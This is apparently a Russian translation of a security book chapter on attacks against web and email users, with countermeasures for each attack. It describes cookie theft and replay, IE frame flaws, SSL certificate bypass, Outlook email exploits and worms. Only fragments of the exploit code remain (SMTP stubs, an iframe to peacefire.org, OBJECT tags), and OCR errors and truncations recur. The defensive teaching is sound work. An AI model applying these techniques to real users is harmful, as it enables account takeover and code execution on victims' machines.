Остерегайтесь монстра Cookie Задумывались ли вы когда-нибудь о том, как на некоторых Web-узлах происходит персонификация посетителей? Это может выражаться, например, в запоминании содержимого "тележки" (если этот узел предназначен для продажи товаров) или в способе заполнения полей какой-нибудь формы. В протоколе HTTP, лежащем в основе функционирования World Wide Web, нет средств, позволяющих отслеживать события от одного посещения узла к другому, поэтому для возможности хранения таких "состояний" было разработано специальное дополнение. Этот механизм, описанный в документе RFC 2109, обеспечивает вставку в передаваемые запросы и ответы HTTP специальных фрагментов данных cookie, позволяющих Web-узлам отслеживать своих посетителей. Данные cookie могут запоминаться на время сеанса связи (per session), оставаясь в оперативной памяти в течение одного сеанса и удаляясь при закрытии броузера, или даже после истечения заданного промежутка времени. В других случаях они бывают постоянными (persistent), оставаясь на жестком диске пользователя в виде текстового файла. Обычно они хранятся в каталоге Cookies (%windir% \Cookies — в Win9x и %userprofile%\Cookies — в NT/2000). Нетрудно догадаться, что после захвата файлов cookie в Internet взломщик может выдавать себя за пользователя данного компьютера, или собирать содержащуюся в этих файлах важную информацию. Прочитав следующие разделы, вы поймете, насколько просто это сделать. Перехват файлов cookie Самый прямой способ заключается в перехвате файлов cookie при их передаче по сети. Затем перехваченные данные можно использовать при входе на соответствующий сервер. Такую задачу можно решить с помощью любой утилиты перехвата пакетов, однако одной из лучших является программа Лаврентия Никулы (Laurentiu Nicula) SpyNet/PeepNet . В состав SpyNet входят две утилиты, которые работают в комплексе. Программа CaptureNet выполняет захват самого пакета и сохраняет его на диске, а утилита PeepNet открывает этот файл и преобразует его в читабельный формат. Следующий пример является фрагментом восстановленного программой PeepNet сеанса связи, во время которого файл cookie служит для аутентификации и управления доступом к просматриваемым страницам (для сохранения анонимности имена изменены). GET http://www.victim.net/images/logo.gif HTTP/1.0 В приведенном примере виден фрагмент cookie, помещенный в поступающий на сервер запрос HTTP. Наиболее важным является поле cuid=, в котором задается уникальный идентификатор, используемый при аутентификации пользователя на узле www.victim.net. Допустим, что после этого взломщик посетил узел victim.net, получил собственный идентификатор и файл cookie (предполагается, что узел помещает данные cookie не в виртуальную память, а записывает их на жесткий диск). Тогда взломщик может открыть свой собственный файл cookie и заменить в нем идентификатор поля cuid=, взяв его из перехваченного пакета. В этом случае при входе на сервер victim.net он будет восприниматься как пользователь, чьи данные cookie были перехвачены. Контрмеры Следует остерегаться узлов, на которых файлы cookie применяются для аутентификации и хранения важных идентификационных данных. Одним из инструментов, помогающих в обеспечении защиты, является программа Cookie Pal компании Kookaburra Software, которую можно найти на Web-узле http://www.kburra.com/cpal.html. Этот программный продукт можно настроить так, чтобы для пользователя генерировались предупреждающие сообщения о попытках Web-узла воспользоваться механизмом cookie. При этом можно "заглянуть за кулисы" и решить, следует ли разрешать выполнение этих действий. В Internet Explorer имеется встроенный механизм поддержки файлов cookie. Чтобы активизировать его, запустите аплет Internet Options панели управления, перейдите во вкладку Security, выберите элемент Internet Zone, установите режим Custom Level и для постоянных и временных данных cookie установите переключатель в положение Prompt. Настройка использования файлов cookie в броузере Netscape выполняется с помощью команды Edit>Preferences>Advanced и установки режима Warn me before accepting a cookie или Disable cookies (рис. 16.3). Принимая файл cookie, нужно проверить, записался ли он на диск, и узнать, собирает ли Web-узел информацию о пользователях. Захват файлов cookie через URL Представим себе нечто ужасное: пользователи Internet Explorer щелкают на специально сконструированных гиперссылках и становятся потенциальными жертвами, рискуя, что их файлы cookie будут перехвачены. Беннет Хазельтон (Bennett Haselton) и Джеми Маккарти (Jamie McCarthy) из тинейджерской организации Peacefire, ратующей за свободу общения через Internet, опубликовали сценарий , воплощающий эту идею в жизнь. Этот сценарий извлекает файлы cookie с клиентского компьютера, если его пользователь щелкает на ссылке, содержащейся на этой странице. В результате содержимое файла cookie становится доступным для операторов Web-узла. <iframe src="http://www.peacefire.org%2fsecurity%2fiecookies%2f Можно составить коварное электронное сообщение, которое "захватывало" бы файлы cookie с жесткого диска пользователя и передавало их операторам узла peacefire.org. Для этого в него много раз нужно поместить ссылку на этот узел так, как показано в примерю. Несмотря на то что ребята из Peacefire выглядят довольно приятными людьми, вряд ли кому-нибудь понравится, если к ним в руки попадут конфиденциальные данные. Контрмеры Установите модуль обновления, который можно найти по адресу http://www. microsoft.com/technet/security/bulletin/ms00-033.asp. Можно воспользоваться также программой Cookie Pal или встроенными возможностями Internet Explorer, как описано выше. |
Изъяны фреймов HTML в Internet Explorer Малоизвестной особенностью броузера Internet Explorer является возможность использования доменной модели обеспечения безопасности ("cross-domain security model"). Исчерпывающее описание этой концепции можно найти по адресу http://www.microsoft.com/technet/security/bulletin/fq00-009.asp. Вкратце это означает следующее. Описываемая модель скрыто используется и предотвращает чтение, доступ и любые другие операции с данными, открытыми в окне одного узла (простейшая форма домена IE), со стороны окна другого узла. При таком подходе фреймы HTML, открытые в каком-либо окне, должны быть доступны только из родительского окна при условии, что оба они относятся к одному и тому же домену. Чтение других доменов с помощью дескриптора IFRAME и document.execCommand Эксперт в области безопасности броузеров Георгий Гунински (Georgi Guninski) обнаружил несколько случаев нарушения модели доменной безопасности, предотвращающей обмен данными между доменами. Контрмеры Установите модуль обновления, который можно найти по адресу http://www. microsoft.com/technet/security/bulletin/ms99-042.asp. Можно также отключить режим использования активных сценариев с помощью процедуры, описанной в разделе "Разумное Использование Зон Безопасности: Общее Решение Проблемы Элементов ActiveX". Проверка принадлежности к доменам Internet Explorer В июне 2000 года Эндрю Носенко (Andrew Nosenko) из компании Mead & Company сообщил о том, что в Internet Explorer две функции не выполняют надлежащую проверку принадлежности к домену. Это позволяет создать такую страницу HTML, которая открывала бы фрейм с локальным файлом и могла читать этот файл . В стремлении быть непревзойденным, Георгий Гунински тоже поместил на своем узле сообщение о подобной уязвимости. Код Георгия поражает обманчивой простотой. <IFRAME ID="I1"X/IFRAME> Как и в предыдущем случае, в качестве цели был избран файл test. Но с таким же успехом можно считать любой другой файл системы пользователя, который можно просмотреть в броузере. Для этого нужно внести соответствующие изменения в строку file://с:/test.txt. Контрмеры Примените модуль обновления, который можно найти по адресу http://www. microsoft.com/technet/security/bulletin/fq00-033.asp. Как и в предыдущих случаях, альтернативной мерой является отключение активных сценариев. Эта предосторожность значительно ограничит функциональные возможности Web-узлов, работа которых основана на применении сценариев (см. раздел, посвященный зонам безопасности). |
Обман SSL SSL — это протокол, используемый в настоящее время в большинстве транзакций, связанных с электронной коммерцией в Internet. В протоколе SSL реализован алгоритм шифрования по открытому ключу, который может отпугивать неискушенных пользователей, однако является важным понятием для того, кто занимается финансовыми операциями в современной экономике. Обход проверки сертификата SSL в Web-броузере В этом разделе вы узнаете о том, как можно ввести в заблуждение службу проверки подлинности сертификата SSL Web-узла, который был бы признан недействительным при обычной перекрестной проверке подлинности сертификата на основе сопоставления имени DNS и IP-адреса сервера на другом конце соединения. Такая проверка должна проводиться в соответствии со спецификацией SSL. Однако группа из Словении ACROS Security Team обнаружила изъян в Netscape Communicator до версии 4.73. После Контрмеры против обхода проверки сертификатов SSL Как упоминалось выше, обновление программы Communicator до версии 4.73 или выше позволит устранить описанную проблему. Тем, кто занимается разработкой различных дополнений к предыдущим версиям, компания Netscape предоставляет диспетчер PSM (Personal Security Manager). Эта программа выполняет шифрование по открытому ключу (подобно тому, которое используется в протоколе SSL) вместо Netscape Communicator 4.7 или других приложений.
щелкнув на маленькой пиктограмме с изображением замочка, расположенной в нижней части окна броузера. Эту же информацию можно получить, щелкнув на кнопке Security панели инструментов Netscape. В Internet Explorer для просмотра анапогичной информации следует сделать щелчок на пиктограмме с набольшим замочком или выбрать команду File=>Properties во время посещения страницы, защищенной протоколом SSL. На рис. 16.4 показан сертификат одного из популярных Web-узлов. |
Уязвимость почтовых приложений Представление большинства людей об Internet связано с наиболее заметной его частью, т.е. с World Wide Web. Однако объем ежедневно отправляемых электронных сообщений, по-видимому, превышает трафик Web. Таким образом, электронная почта является автономным эффективным средством, входящим в набор пользователя Internet, которое помогает ему комфортно чувствовать себя в киберпространстве. Интересен тот факт, что два чрезвычайно популярных протокола Internet, HTTP и SMTP, имеют много точек соприкосновения, что чрезвычайно увеличивает потенциальную опасность. Сообщения электронной почты в формате HTML — эффективное средство направленного взлома многих броузеров. Для подобных атак можно применять многие из ранее описанных методов, а возможно, и какие-то другие. Добавьте в электронные сообщения небольшого количества мобильного кода — и процесс проникновения в системы доверчивых пользователей станет во многом похож на детскую игру. Хотя в этом разделе речь идет исключительно об электронной почте, ясно, что описываемые приемы можно применить и к сообщениям групп новостей Internet. Такая тактика может привести даже к еще более массовым разрушениям, чем "спэм", при котором используются данные методы. |
Запуск произвольного кода с помощью электронной почты При описании следующих атак будут продемонстрированы различные механизмы запуска команд на целевом компьютере. Многие из них приводятся в действие при открытии коварных сообщений или их предварительном просмотре в соответствующей части окна программ Outlook и Outlook Express. Атаки с использованием элементов ActiveX, помеченных как "safe for scripting" Взломщики не могли выдумать ничего более убийственного: все, что нужно сделать жертве, — это просто прочитать сообщение (или просмотреть его в окне предварительного просмотра программ Outlook и Outlook Express, если такая возможность имеется). При этом со стороны пользователя не требуется никакого вмешательства. Эта чудовищная "простота" снова появилась благодаря элементу управления Scriptlet. typelib, помеченному как "safe for scripting" (более подробно этот вопрос обсуждается в разделе, посвященном элементам ActiveX). С такой же легкостью можно использовать Eyegod.ocx, но метод, рассматриваемый в данном разделе, основан на применении проверочного кода Георгия Гунински, в котором используется элемент управления Scriptlet. typelib. Напомним, что Георгий поместил этот код на своем Web-узле. Ниже приведена слегка модифицированная версия этого кода, вставленного в капсулу для взлома почты. helo somedomain.com Этот код проводит атаку в два этапа. Во-первых, он создает в папке Startup на компьютере пользователя файл приложения HTML (с расширением .НТА) и записывает в него содержимое сценария. Этот файл создается почти незаметно для пользователя, пока он просматривает сообщение (если внимательно следить за световым индикатором жесткого диска, то можно заметить его мерцание). Вот как выглядит наше тестовое сообщение в папке inbox (ниже на рисунке показано окно программы Outlook Express). Для завершения взлома достаточно отобразить сообщение в окне предварительного просмотра. Следующий этап произойдет, когда пользователь перезагрузит компьютер. Рано или поздно это неизбежно случится. Конечно же, можно написать такой сценарий, который сам выполнял бы перезагрузку. При этом запустится файл .НТА (данные файлы автоматически интерпретируются командной оболочкой Windows). В нашем случае пользователь получит следующее "приветственное" сообщение. Эти безобидные действия — одна из многих реализаций в безбрежном море возможностей. В подобной ситуации жертва полностью находится в руках взломщика. Контрмеры Примените модули обновления для компонентов ActiveX Scriptlet и Eyedog, которые можно получить по адресу http://www.microsoft.com/technet/security/ bulletin/ms99-032.asp. "Запуск" документов MS Office с помощью элементов ActiveX Георгий Гунински не ограничил свои изыскания использованием дескрипторов HTML в электронном сообщении для загрузки потенциально опасных элементов управления ActiveX. В последующих информационных сообщениях, опубликованных на его узле, сообщается, что с помощью этого же метода могут быть "запущены" и потенци-ачьно опасные документы Microsoft Office ("поведение" этих документов очень похоже на поведение элементов управления ActiveX). С результатами исследований можно ознакомиться по адресу http://www.nat.bg/-joro/sheetex-desc.html (для документов Excel и PowerPoint) и http://www.nat.bg/~joro/access-desc.html (здесь описывается процедура запуска кода VBA, содержащегося в базах данных Access). OBJECT data="db3.mdb" id="dl"></OBJECT> Как только программа Internet Explorer встречает дескриптор объекта, загружается база данных Access, имя которой задано в параметре data=, а затем для ее открытия вызывается программа Access. Это происходит перед тем, как пользователь получит предупреждение о потенциальной опасности, которая при этом может возникнуть. Таким образом, база данных будет запущена независимо от того, настроен IE/Outlook/ОЕ для запуска элементов управления ActiveX или нет. Ну и дела! helo some domain, corn В этом примере явно задан URL файла db3.mdb (строка 12), чтобы можно было использовать его в сообщении электронной почты. Институтом SANS было выдвинуто требование, чтобы при доступе и совместном использовании файлов Access через Internet применялся протокол SMB. Просто поразительно, сколько FTP-серверов предоставляет свои ресурсы для бесконтрольного размещения данных и доступа к ним. В следующих разделах указаны другие места хранения данных, которые могут заинтересовать взломщиков. Контрмеры: задание пароля администратора Ассеss Запрещение использования элементов управления ActiveX не предотвратит возможности реализации описанных атак. Поэтому нужно применить модуль обновления в соответствии с инструкциями, приведенными по адресу http://www.microsoft.com/-technet/security/bulletin/MS00-049.asp. Особое внимание следует обратить на модуль обновления, предназначенный специально для устранения проблемы, связанной с Access (компания Microsoft назвала ее изъяном "сценария IE" ("IE Script")). Запуск файлов с помощью ненулевого параметра CLSID элементов ActiveX Причиной выявления данного изъяна послужило вскользь сделанное замечание в дискуссии, которая велась в бюллетене Bugtraq по поводу уязвимости, обусловленной "навязыванием" файла вложения (см. ниже), которую предложили реализовать на узле malware. com. Велд Понд (Weld Pond), высококлассный хакер из группы LOpht, прославившийся благодаря утилите netcat для NT (см. главу 5), завел со своим коллегой Oil Dog из группы "Cult of Dead Cow", знаменитым автором программы Back Orifice 2000 (см. главы 4 и 14), разговор о механизме запуска файлов, навязанных пользователям по методике malware.com. Оказывается, можно запустить любой файл, поместив в тело электронного сообщения дескриптор OBJECT и сконфигурировав его с помощью ненулевого параметра CLSID. При этом в мишень превращается каждый исполняемый файл, находящийся на диске пользователя. Ниже приведен пример соответствующей капсулы для взлома электронной почты. helo somedomain.com Обратите внимание на ненулевой параметр CLSID. Именно он приводит в действие весь механизм. Файл, который будет запущен, задается параметром CODEBASE. Контрмеры против использования ненулевого параметра CLSID Основываясь на результатах тестирования, авторы утверждают, что установка соответствующего уровня безопасности зоны позволит устранить эту проблему (см. в предыдущих разделах описание зон безопасности). Переполнение буфера поля даты в программах Outlook и Outlook Express Возможно, кому-то из читателей показалось, что стержнем большинства типов атак являются элементы управления ActiveX. 18 июля 2000 года в бюллетене Bugtraq появилось сообщение об изъяне программ Outlook и Outlook Express совсем другого типа, не имеющем ничего общего с элементами ActiveX. Date: Tue, 18 July 2000 14:16:06 +<около 1000 байтхкод для запуска> В этой книге уже неоднократно упоминалось, что возможность запуска в системе произвольного кода открывает неограниченные возможности. Коварное сообщение позволяет незаметно установить программу типа "троянский конь". Через него могут распространяться "черви", а, кроме того, оно может дискредитировать целевую систему, запускать вложения — одним словом, делать практически все, что заблагорассудится. helo somedomain.com Группа Underground Security Systems Research (USSR, http://www.ussrback.com) также сообщила о том, что обнаружила эту брешь (по крайней мере, об этом заявил хакер Метатрон (Metatron)). Однако, по их утверждению, они не стали сообщать о ней публично, ожидая, пока Microsoft выпустит соответствующий модуль обновления. На базе этого изъяна группа USSR опубликовала свою реализацию, что вызвало интерес к их Web-узлу. Код запускается почти таким же образом, как и в предыдущем примере. Контрмеры против переполнения поля даты Согласно информационному сообщению компании Microsoft, которое можно найти на ее Web-узле по адресу http://www.microsoft.com/technet/
Если выполняется установка, отличная от установки по умолчанию, и во время этого процесса устанавливаются обновленные компоненты Outlook Express, то эта уязвимость также устраняется (при этом у пользователя будет возможность соответствующего выбора). |
"Черви", распространяющиеся через адресную книгу Outlook В течение нескольких последних лет XX века мошенники, избравшие своим инструментом компьютерные коды, организовывали за счет пользователей программ Outlook и Outlook Express буйную новогоднюю "вечеринку". Ими было выпущено целое полчище вирусов-червей, размножающихся по изящной технологии: осуществляя самостоятельно рассылку по каждому адресу, найденному в адресной книге жертвы, эти вирусы маскировались под сообщения, присланные из надежного источника. Это оригинальное применение методов соииа1ьной инженерии (см. главу 14) было ударом, который злой гений-изобретатель наносил наверняка. Корпорации, в которых работали десятки тысяч служащих, активно использующих Outlook, были вынуждены отказаться от применения почтовых служб, чтобы остановить поток сообщений, снующих туда-сюда от одного пользователя к другому, засоряя почтовые ящики и забивая до отказа дисковое пространство почтовых серверов. Согласитесь, тяжело удержаться от того> чтобы не открыть вложение, пришедшее от знакомого, которому вы доверяете. "Червь" ILOVEYOU Ниже приведена подпрограмма "червя" ILOVEYOU. написанная на языке VBScript. которая обеспечивает его распространение через электронную почту (некоторые строки были разделены вручную, чтобы уместить их на странице). sub spreadtoemail() Эта простая программа длиной в 37 строк обращается к интерфейсу MAPI, чтобы отыскать местоположение адресной книги Windows (WAB — Windows Address Book) в системном реестре. Затем она создает новое почтовое послание с темой I LOVE YOU и телом kindly check the attached LOVELETTER coming from me ("будьте так любезны, прочтите вложенное любовное письмо, пришедшее вместе с данным сообщением"), которое рассылается каждому найденному адресату. Если кто-нибудь из далеких от программирования читателей думает, что речь здесь идет о какой-нибудь сложной науке, то будет уместно напомнить, что принцип работы вируса ILOVEYOU основан на дипломной работе, написанной 23-летним студентом. Кто знает, какой еще ущерб мог бы быть нанесен? Как остановить "червей", распространяющихся через адресную книгу После нескольких лет критики в средствах массовой информации компания Microsoft устала обвинять пользователей в том, что они сами запускают вложения электронной почты, в которых содержатся вирусы-"черви", и выпустила соответствующий модуль обновления. Он называется Outlook 2000 SR-1 E-mail Security Update и Outlook 98 E-mail Security Update (http://officeupdate.microsoft.com/2000/downloadDetails/Out2ksec.hem и Out98sec .htm соответственно). Одной из особенностей этого модуля является наличие в нем механизма защиты модели объектов (Object Model Guard), который был разработан .для предупреждения пользователей о том, что внешней программой предпринята попытка получения доступа к их адресной книге Outlook или отправки сообщений от их имени. Компания Reliable Software Technologies Corporation (RSTCorp) выпустила дополнительную утилиту, предотвращающую обращения к Outlook определенного типа, поступающие от компонента Virtual Basic Scripting Engine. Таким образом можно предотвратить распространение вирусов, подобных 1EOVEYOU. Эту дополняющую программу, которая называется JustBeFriends.dll (JBF), можно использовать совместно с модулем обновления программы Outlook, который предлагается компанией Microsoft. В отличие от механизма OMG компании Microsoft, который контролирует доступ к функциям Outlook внутри самой программы, JBF контролирует возможность доступа к Outlook или Outlook Express со стороны других приложений. Если попытка доступа осуществляется с помощью сценария, запушенного с рабочего стола или из вложения, то утилита JBF предотвращает эту попытку. В противном случае пользователь должен подтвердить, что данному приложению разрешен доступ к Outlook. |
Атаки с использованием вложений Одной из наиболее удобных особенностей электронной почты является возможность вставки в сообщения файлов. Однако это удобство, позволяющее сэкономить время, имеет и очевидные отрицательные стороны, а именно: у пользователей появляется непреодолимая тяга запустить чуть ли не каждый файл, полученный по электронной почте. Кажется, никому не нужно напоминать, что это равносильно приглашению к себе в гостиную плохих парней. Взлом с использованием в качестве вложений файлов-оболочек Малоизвестным секретом системы Windows является то, что у файлов с расширением . SHS их реальное расширение по умолчанию скрыто в соответствии с параметром системного реестра HKEY_CLASSES_ROOT\ShellScrap\NeverShowExt. Очевидно, что в этом не было бы ничего особенного, если бы эти файлы .SHS, также известные как объекты Shell Scrap Objects, не обладали возможностью запускать команды. Основанные на технологии Object Linking and Embedding (OLE), обсуждавшейся в разделе, посвященном элементам управления ActiveX, эти файлы являются, по существу, оболочками для других внедренных объектов. Такими объектами могут быть электронные таблицы Excel (большинство читателей знают, что их можно помещать в документы Word) или файлы другого типа. Самый простой способ создать такой файл — это поместить какой-либо файл в другое приложение, поддерживающее технологию OLE (например, Wordpad), а затем скопировать его пиктограмму в другую папку. Теперь файл, который мы вставляли, содержится в своем собственном файле-оболочке, имеет свою пиктограмму и уникальное расширение (SHS). При запуске файла SHS помещенный в него объект запускается вместе с ним. Более того, с помощью компонента Microsoft Object Packager с вложенным объектом можно связывать команды, что открывает новые возможности для тех, кто хоть немного знаком с DOS. Контрмеры против использования файлов. SHS На Web-узле PCHelp приведены некоторые замечательные советы по снижению риска от применения наиболее опасных свойств файлов . SHS. В число этих рекомендаций входят следующие.
Сокрытие расширения вложения с помощью пробелов 18 мая 2000 года Волкер Вес (Volker Werth) поместил в списке рассылки Incidents сообщение, в котором говорилось об одном методе отправки вложений в почтовых сообщениях. Особенность этого метода заключалась в остроумном способе маскировки имени присоединенного файла. Вставка в имя файла символов пробелов (%20) приводила к тому, что почтовые программы отображали только первые несколько символов имени файла. Например,
Контрмеры против сокрытия имени присоединенного файла Из приведенного рисунка видно, что файл вложения не является документом Word. На это указывает и троеточие (...)• Если этих признаков недостаточно, то вообще не стоит открывать файл вложения прямо из почтовой программы! В этом поможет модуль обновления Outlook SR-1 Security. После его установки пользователю придется принудительно сохранять на диске те файлы, которые могут нанести ущерб. Методы социальной инженерии, помогающие ввести пользователя в заблуждение и загрузить вложение Социальная инженерия — это действенный метод, помогающий убедить пользователя сохранить файл вложения на диске. Вам когда-нибудь встречалось сообщение со следующим текстом? Меры предосторожности против трюков с вложением Контролируйте свои действия и не совершайте необдуманных поступков. Перед тем как запустить сохраненные на диске вложения, проверяйте их на наличие вирусов с помощью специальных программ. Даже если в результате проверки не будет обнаружено ничего подозрительного, перед запуском нужно всерьез подумать о том, кто является автором сообщения. При этом помните, что такие вирусы-"черви", как ILOVEYOU, могут быть получены даже от самых близких друзей. |
Запись вложений на диск без участия пользователя До сих пор речь шла о различных механизмах запуска файлов, которые можно обманным путем поместить на удаленный диск пользователя. Описанные выше виды взлома были рассчитаны на определенные исполняемые файлы (расположенные либо на удаленном сервере, либо на диске пользователя), выполняющие свою грязную работу. А что, если взломщик имеет возможность записывать на диск выбранной жертвы свои файлы? Пользуясь этим, можно разработать завершенный способ доставки в систему пользователя и запуска в ней файлов, реализующих взлом. Перехват функции Save As программ Excel и PowerPoint Фокус, лежащий в основе этого взлома, был придуман Георгием Гунински, который остроумно воспользовался функцией SaveAs программ Excel и PowerPoint. Как только документ Office с помощью дескриптора OBJECT вызывается в программе Internet Explorer (об этом уже упоминалось выше), появляется возможность сохранить данные в произвольном месте диска. В своей реализации этой идеи Георгий сохраняет данные, извлеченные из файла Bookl.xi.r-. Он является обычным файлом в формате Excel с расширением .xla. Если такой файл поместить в папку Startup, то во время загрузки системы он будет запущен. helo somedomain.com Написанный Георгием код расположен между дескрипторами <object> и </SCRlPT>. Изменения внесены таким образом, чтобы указать полный адрес URL файла Bookl.xla (в первоначальной реализации этот файл был доступен непосредственно на Web-сервере). Содержимое Bookl.xla записывается в файл, указанный в строке fn=. Из исходного кода Георгия удалены также строки комментариев, в которых указано, как сохранить этот файл (предполагается, что об этом нетрудно догадаться). Просмотр этого сообщения в программе Outlook Express системы NT4 с зоной, для которой задан уровень безопасности Low, приведет к неожиданному появлению на короткое время окна передачи файла, вслед за которым появится следующее сообщение. Здесь авторы в качестве материала воспользовались уже готовым файлом Георгия Bookl.xla. Этот файл абсолютно безобиден. В нем содержится код длиной в пару строк, который при запуске выводит в окне DOS сообщение Hello World. Однако ввиду увеличения числа серверов, предоставляющих услуги по анонимному хранению файлов, хакеру-злоумышленнику будет совсем несложно создать свой собственный документ Office и обеспечить его загрузку. Готовой базой для размещения таких файлов также могут быть плохо настроенные или взломанные серверы FTP. Меры предосторожности против записи файлов с помощью программ Excel и PowerPoint Стоит ли повторять еще раз? Воспользуйтесь соответствующими модулями обновления, которые можно найти на Web-узле по адресу http://www.microsoft.com/ technet/security/bulletin/MS00-049. asp. Установка этих модулей обновления приведет к тому, что документы Excel и PowerPoint будут помечены как "unsafe for scripting" (пожалуйста, не торопитесь смеяться). Конечно, можно совсем запретить использование элементов управления ActiveX, как описано в разделе, посвященном зонам безопасности, тем самым раз и навсегда закупорив эту злосчастную брешь. Вложения с принудительной загрузкой Для описанного на Web-узле http://4-ww.malware.com способа загрузки файла на диск пользователя без его разрешения на этом же узле было предложено название принудительная загрузка (force feeding). Сущность данного подхода состоит в том, что, как утверждают специалисты, Outlook/OE игнорирует ответ пользователя на вопрос о том, что делать с файлом вложения электронного сообщения. Обычно, когда присоединенный файл запускается из почтовой программы, пользователю предоставляется три варианта действий: Open, Save To Disk или Cancel. Согласно утверждению, приведенному на узле malware.com, независимо от выбора пользователя вложение будет записано в каталог Windows %temp% (С: \Windows\temp — в Win 9x и С: \temp — в NT). Временные каталоги в Win 2000 настраиваются по усмотрению пользователя, поэтому, если эта система устанавливалась "с нуля", а не поверх предыдущих версий, определить их местоположение сложнее. Поместив требуемые файлы в систему пользователя, их можно запустить с помощью специального дескриптора HTTP. При этом броузеру скрытно и автоматически будет передана страница, указанная в дескрипторе. Например, <МЕТА HTTP-EQUIV="refresh" Этот код, помещенный на Web-страницу, перенаправит броузер на Web-узел www.othersite.com. Параметр context= задает интервал ожидания, по истечении которого броузером будет выполнен заданный переход. Для принудительной загрузки операторы узла malware.com выбрали один из их локальных файлов и поместили его адрес в дескриптор. Запись вложения в каталог TEMP с помощью дескриптора I FRAME Данный метод, который в 2000 году был опубликован Георгием в девятом номере его информационного бюллетеня , продемонстрировал дальновидность его автора, которому удалось умело воспользоваться, казалось бы, незначительными проблемами. Предложенный подход основан на том, что программы Outlook и Outlook Express создают в каталоге TEMP файлы с известным именем и произвольным содержимым, что очень похоже на механизм, созданный на узле malware.com. Однако, использовав другие свои разработки, в число которых входит использование изъяна, позволяющего запускать ярлыки файлов справочной системы Windows , и дескрипторы IFRAME, Георгий разработал, по-видимому, непревзойденный непротиворечивый механизм доставки кода и его последующего запуска. Поэтому авторы присвоили этому методу степень риска, равную восьми, т.е. наивысшую среди рассматриваемых. Он гораздо ближе других алгоритмов подошел к тому, чтобы стать целостным пакетом, предоставляя возможность записи файла на диск и запуска этого файла без необходимости какого-либо вмешательства пользователя. helo somedoir.ain.com В процессе тестирования, выполненного авторами на программах Outlook и Outlook Express, установленных в системах Windows 9x, NT и 2000, этот метод работал безотказно, чаще всего в режиме предварительного просмотра. Строки, которые начинаются с setTimeout, задают каталог каждой из трех операционных систем. Сможете ли вы установить между ними соответствие? Контрмеры против использования дескрипторах FRAME Единственной защитой против атак такого рода является осторожное обращение с элементами управления ActiveX, как упоминалось в разделе, посвященном зонам безопасности. О выпуске соответствующего модуля обновления компания Microsoft не позаботилась. |
Уязвимость службы IRC Internet Relay Chat (IRC) является одним из наиболее популярных приложений Internet. Эта программа привлекает пользователей не только тем, что они могут общаться в реальном времени, но и возможностью без задержки обмениваться файлами с помощью самых современных клиентских программ IRC (авторы отдают предпочтение mIRC). Вот здесь-то и начинаются проблемы. Взлом DCC Интересная дискуссия по поводу описываемой в данном разделе атаки завязалась в списке рассылки Incidents на Web-узле http://www.securityfocus.com (обзор за 10-11 июля 2000 года, №2000-131). Вот поучительная история: любопытному пользователю предложили получить файл по прямому каналу DCC (DCC — direct client to client) (в службе IRC используются методы под названием DCC Send и DCC Get, предназначенные для установки прямого соединения с другим клиентом IRC и передачи/приема файлов с использованием этого соединения, а не сети IRC). Файл назывался LIFE_STAGES.TXT. (Где же он нам встречался? Загляните-ка в один из предыдущих разделов, в котором описываются вложения файлов . SHS Windows.). Ясно, что это была либо очевидная попытка причинить вред, либо автоматизированная атака, выполняемая с использованием взломанного клиента IRC без ведома его хозяина. Контрмеры К счастью, большинство клиентов IRC по умолчанию загружают файлы, передаваемые по DCC, в заданный пользователем каталог. После получения файла пользователь должен зайти в этот каталог и запустить файл вручную. |
Взлом Napster с помощью программы Wrapster
Хотя авторы и не считают, что приложения Napster и Wrapster в настоящее время представляют большую угрозу для безопасности, они полагают, что оба программных продукта в значительной мере обладают отличительными особенностями программ, имеющих отношение к хакингу. Именно поэтому о них следует упомянуть в данной книге. Те читатели, кто знает, о чем пойдет речь в этом разделе, могут сразу перейти к следующему. А тем, кто ничего не слышал хотя бы об одной из этих программ, стоит с ними познакомиться. Всем, независимо от отношения к проблемам интеллектуальной собственности и авторского права, будет полезно узнать о необычайном удобстве, богатстве выбора и настоящем удовольствии, предоставляемом программой Napster. Еще один пример программного продукта, по вине которого могут возникнуть проблемы нарушения безопасности, вызванные сочетанием его мощи и популярности, — революционное изобретение для сетевого обмена файлами компании Napster (http://www. napster.com). Пакет Napster представляет собой разновидность типичного средства обмена файлами на платформе клиент/сервер. При этом сервер функционирует в качестве централизованного индексного указателя аудиофайлов в формате МРЗ, которые хранятся на жестких дисках всех пользователей, подсоединившихся к сети с помощью клиентской программы Napster. В индексном указателе пользователи могут выполнять поиск МРЗ-файлов. которые они хотят загрузить, а сервер соединяет их клиентскую программу непосредственно с тем пользователем, на диске которого хранятся требуемые файлы. Таким образом, все пользователи, желающие принять участие в обмене, должны выделить какой-то участок своего жесткого диска и предоставить остальным право чтения/записи. Появились сведения о том, что различные клоны пакета Napster, распространяющиеся через открытые источники, обладают изъяном. Он позволяет взломщикам просматривать файлы на том компьютере, на котором запущена уязвимая клиентская программа Napster (в официальных коммерческих версиях этот изъян отсутствует). |
Глобальные контрмеры против атак на пользователей Internet В этой главе приведено множество опасных атак на пользователей Internet. Многие из описанных приемов направлены на то. чтобы обманным путем принудить пользователя запустить вирус, "червь" или другой опасный код. Кроме того, были представлены многие частные решения подобных проблем. Теперь пришло время познакомиться с общими методами зашиты против подобных атак. |
Постоянно обновляйте антивирусные базы данных Конечно, такое средство защиты, как антивирусные программы, существует и повсеместно используется уже давно. Тот. кто не применяет их для обеспечения безопасности своей системы, подвергает себя большому риску. Подобное программное обеспечение можно приобрести у многих разработчиков. Известные антивирусные пакеты (такие как Norton Antivirus компании Symantec, McAfee, Data Fellows, Trend Micro. Inoculan/InoculateIT компании Computer Associates и другие) соревнуются между собой, стараясь обеспечить наиболее полную защиту от злонамеренного кода. |
Защита шлюзов Надежная стратегия защиты на уровне сети является наиболее эффективным способом защиты большого количества пользователей. В качестве средства для решения многих описанных в этой главе проблем, конечно же, следует выбрать брандмауэр. Особое внимание нужно уделять спискам управления доступом из глобальной сети, которые могут стать мощной преградой для коварного кода, пытающегося проникнуть на плохо настроенные внутренние серверы. |
